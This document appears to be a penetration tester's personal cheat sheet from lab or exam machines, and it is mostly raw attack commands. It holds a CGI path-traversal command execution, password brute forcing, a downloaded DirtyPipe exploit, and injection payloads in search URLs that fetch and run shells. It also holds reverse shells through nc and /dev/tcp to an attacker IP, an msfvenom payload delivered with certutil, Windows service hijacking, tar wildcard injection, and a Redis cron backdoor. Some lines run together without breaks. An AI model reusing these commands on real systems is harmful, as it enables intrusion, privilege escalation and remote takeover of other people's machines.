Misc
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; whoami" "192.168.231.149/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2";
hydra -l kiero -P /usr/share/wordlists/rockyou.txt ftp://192.168.231.149
hydra -l kiero -P /usr/share/wordlists/rockyou.txt ssh://192.168.231.149
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
CVE-2022-0847 (DirtyPipe)
curl http://192.168.45.166/50808.c -o priv.c
gcc priv.c -o exploit1
find / -perm -4000 2>/dev/null
./exploit1 /home/john/RESET_PASSWD
---------------
python textshell2.py -u 'http://192.168.245.150:8080/search?query=' -c 'whoami' -m 'rce'
sudo tcpdump -i tun0
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27ping%20192.168.45.166%27)%7D HTTP/1.1
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27wget%20192.168.45.166/testshell%20-O%20/tmp/testshell%27)%7D HTTP/1.1
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27sh%20/tmp/testshell%27)%7D HTTP/1.1
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27sh%20/tmp/testshell%27)%7D%20HTTP/1.1
ssh -R 5555:127.0.0.1:8000 -vv -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected]
ssh-keygen -t rsa -f ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub >> /home/kali/.ssh/authorized_keys
wget http://192.168.45.166/id_rsa -O id_rsa
ssh -i id_rsa -R 5555:127.0.0.1:8000 -vv -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected]
nmap -sV -Pn -n -p 5555 --script=banner 127.0.0.1
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "ncat -v -l -p 1234 -e /bin/bash"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "nc -e /bin/bash 192.168.45.166 2233"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "ncat -v -l -p 1234 -e /bin/bash"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "bash -c 'bash -i >& /dev/tcp/192.168.45.166/2233 0>&1'"
wget http://192.168.45.166/linpeas.sh -O /tmp/linpeas.sh
wget http://192.168.45.166/41154.sh -o lpe.sh
[+] [CVE-2021-3156] sudo Baron Samedit 2
[+] [CVE-2021-3156] sudo Baron Samedit
[+] [CVE-2021-4034] PwnKit
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
python3 ~/Downloads/AutoRecon-main/autorecon.py 192.168.245.151
python3 free.py 192.168.245.151 'type c:\users\chris\Desktop\local.txt'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.166 LPORT=443 -f exe -o 2shell.exe
python3 free.py 192.168.245.151 'certutil.exe -urlcache -split -f http://192.168.45.166/2shell.exe c:\users\public\2shell.exe'
python3 free.py 192.168.245.151 'c:\users\public\2shell.exe'
iwr -uri http://192.168.45.166/winPEASx64.exe -Outfile wpeas.exe
.\nc.exe 192.168.45.166 1337 -e cmd
iwr -uri http://192.168.45.166/SigmaPotato.exe -Outfile sp.exe
.\sp.exe "nc.exe 192.168.45.166 2337 -e cmd"Service Changes:
python3 51010.py --target 192.168.232.155 --lhost 192.168.45.172 --file shell.exe GPGOrchestrator(Genomedics srl - GPG Orchestrator)["C:\Program Files\MilleGPG5\GPGService.exe"] - Auto - Running
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Users [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: C:\Program Files\MilleGPG5 (Users [WriteData/CreateFiles])
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
GPGOrchestrator: AllAccess
C:\Program Files\MilleGPG5(Users [WriteData/CreateFiles])
iwr -uri http://192.168.45.172/shell.exe -Outfile 2shell.exe
sc config GPGOrchestrator binpath="C:\users\public\2shell.exe"
net stop GPGOrchestrator
net start GPGOrchestratorTAR Number:
cat /etc/cron.d
CronJob:
*/2 * * * * root cd /opt/admin && tar -zxf /tmp/backup.tar.gz *
📜 Malicious Script Injected (in /opt/admin/test.sh)
echo "chmod u+s /bin/bash" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > "--checkpoint=1"
Explanation:
These are special tar options abuse using --checkpoint and --checkpoint-action:
--checkpoint=1: triggers action every 1 checkpoint.
--checkpoint-action=exec=sh test.sh: executes the test.sh script.
test.sh runs chmod u+s /bin/bash, setting the SUID bit, which allows any user to run bash with root privileges.
This is not a shell option. It is a file name. The trick is:
When tar extracts files, it treats file names starting with -- as tar options if not handled securely. So:
--checkpoint-action=exec=sh test.sh becomes an option to tar during extraction.
It tells tar: “After every checkpoint, run sh test.sh.”
Combined with:
echo "" > --checkpoint=1
It adds another fake file named --checkpoint=1, telling tar to trigger an action every checkpoint.
then execute /bin/bash -p
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Connect to Redis server
redis-cli -h <target_ip> -p <port>
# Inject reverse shell into key
SET 1 "\n\n* * * * * bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1\n\n"
# Point Redis's dump directory to cron path
CONFIG SET dir /var/spool/cron/crontabs/
CONFIG SET dbfilename root
# Save the malicious key as a file (cron job)
SAVEimport subprocess
# Path to the usernames file (one username per line)
user_file = "usernames.txt"
# Redis host
redis_host = "canyoupwnme"
# Read usernames from the file
with open(user_file, "r") as f:
usernames = [line.strip() for line in f if line.strip()]
# Loop through usernames and run redis-cli commands
for user in usernames:
redis_dir = f"/root/{user}"
command = ["redis-cli", "-h", redis_host, "CONFIG", "SET", "dir", redis_dir]
try:
print(f"[*] Setting dir to: {redis_dir}")
output = subprocess.check_output(command, stderr=subprocess.STDOUT)
print(output.decode().strip())
except subprocess.CalledProcessError as e:
print(f"[!] Failed for {user}: {e.output.decode().strip()}")
Last updated